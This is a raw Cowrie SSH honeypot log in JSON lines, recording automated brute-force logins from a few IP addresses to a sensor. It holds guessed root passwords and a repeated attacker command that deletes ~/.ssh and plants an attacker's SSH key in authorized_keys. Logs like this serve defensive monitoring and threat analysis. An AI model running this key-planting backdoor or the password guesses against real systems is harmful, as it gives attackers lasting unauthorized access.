{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:02.994988Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.login.success","username":"root","password":"qazwsx1","message":"login attempt [root/qazwsx1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:48:03.340063Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:48:03.560632Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:48:03.561452Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:48:03.562718Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:03.639810Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:48:03.874586Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:48:03.875446Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:48:03.953416Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:03.954512Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33146,"dst_ip":"1.2.3.4","dst_port":22,"session":"62e14b6c880c","protocol":"ssh","message":"New connection: 212.227.235.229:33146 (1.2.3.4:22) [session: 62e14b6c880c]","sensor":"my-vps","timestamp":"2025-08-26T04:48:04.025012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:04.025934Z","src_ip":"212.227.235.229","session":"62e14b6c880c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:04.098500Z","src_ip":"212.227.235.229","session":"62e14b6c880c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:48:04.427533Z","src_ip":"212.227.235.229","session":"62e14b6c880c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:05.502385Z","src_ip":"212.227.235.229","session":"62e14b6c880c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33156,"dst_ip":"1.2.3.4","dst_port":22,"session":"7df312dfd392","protocol":"ssh","message":"New connection: 212.227.235.229:33156 (1.2.3.4:22) [session: 7df312dfd392]","sensor":"my-vps","timestamp":"2025-08-26T04:48:05.577419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:05.578279Z","src_ip":"212.227.235.229","session":"7df312dfd392"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:05.654258Z","src_ip":"212.227.235.229","session":"7df312dfd392"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:48:05.998217Z","src_ip":"212.227.235.229","session":"7df312dfd392"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:06.076646Z","src_ip":"212.227.235.229","session":"32445dbdd10d"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:06.077498Z","src_ip":"212.227.235.229","session":"7df312dfd392"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49980,"dst_ip":"1.2.3.4","dst_port":22,"session":"623be9470d4c","protocol":"ssh","message":"New connection: 212.227.235.229:49980 (1.2.3.4:22) [session: 623be9470d4c]","sensor":"my-vps","timestamp":"2025-08-26T04:48:08.711128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:08.711795Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:09.943178Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.login.success","username":"root","password":"nexus@123","message":"login attempt [root/nexus@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:48:10.697529Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:48:11.218611Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:48:11.219293Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:48:11.220309Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:11.472580Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:48:13.123168Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:48:13.124053Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:48:13.377009Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:13.378011Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49986,"dst_ip":"1.2.3.4","dst_port":22,"session":"f535ab8ee6dd","protocol":"ssh","message":"New connection: 212.227.235.229:49986 (1.2.3.4:22) [session: f535ab8ee6dd]","sensor":"my-vps","timestamp":"2025-08-26T04:48:14.365779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:14.366727Z","src_ip":"212.227.235.229","session":"f535ab8ee6dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:14.620512Z","src_ip":"212.227.235.229","session":"f535ab8ee6dd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:48:16.285954Z","src_ip":"212.227.235.229","session":"f535ab8ee6dd"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:17.543364Z","src_ip":"212.227.235.229","session":"f535ab8ee6dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33516,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4338ccaa289","protocol":"ssh","message":"New connection: 212.227.235.229:33516 (1.2.3.4:22) [session: f4338ccaa289]","sensor":"my-vps","timestamp":"2025-08-26T04:48:17.814605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:17.815328Z","src_ip":"212.227.235.229","session":"f4338ccaa289"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:19.117137Z","src_ip":"212.227.235.229","session":"f4338ccaa289"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:19.659685Z","src_ip":"176.65.149.186","session":"733de7d39f0d"}
{"eventid":"cowrie.session.closed","duration":180.09878492355347,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:19.665377Z","src_ip":"176.65.149.186","session":"733de7d39f0d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:48:19.938552Z","src_ip":"212.227.235.229","session":"f4338ccaa289"}
{"eventid":"cowrie.session.closed","duration":"11.5","message":"Connection lost after 11.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:20.208194Z","src_ip":"212.227.235.229","session":"623be9470d4c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:48:20.211878Z","src_ip":"212.227.235.229","session":"f4338ccaa289"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54228,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8056a9f9e52","protocol":"ssh","message":"New connection: 212.227.235.229:54228 (1.2.3.4:22) [session: c8056a9f9e52]","sensor":"my-vps","timestamp":"2025-08-26T04:48:33.158400Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:48:33.159504Z","src_ip":"212.227.235.229","session":"c8056a9f9e52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:48:33.428857Z","src_ip":"212.227.235.229","session":"c8056a9f9e52"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":57302,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8b0220f56c1","protocol":"ssh","message":"New connection: 45.88.8.215:57302 (1.2.3.4:22) [session: a8b0220f56c1]","sensor":"my-vps","timestamp":"2025-08-26T04:48:33.863717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:48:34.332148Z","src_ip":"45.88.8.215","session":"a8b0220f56c1"}
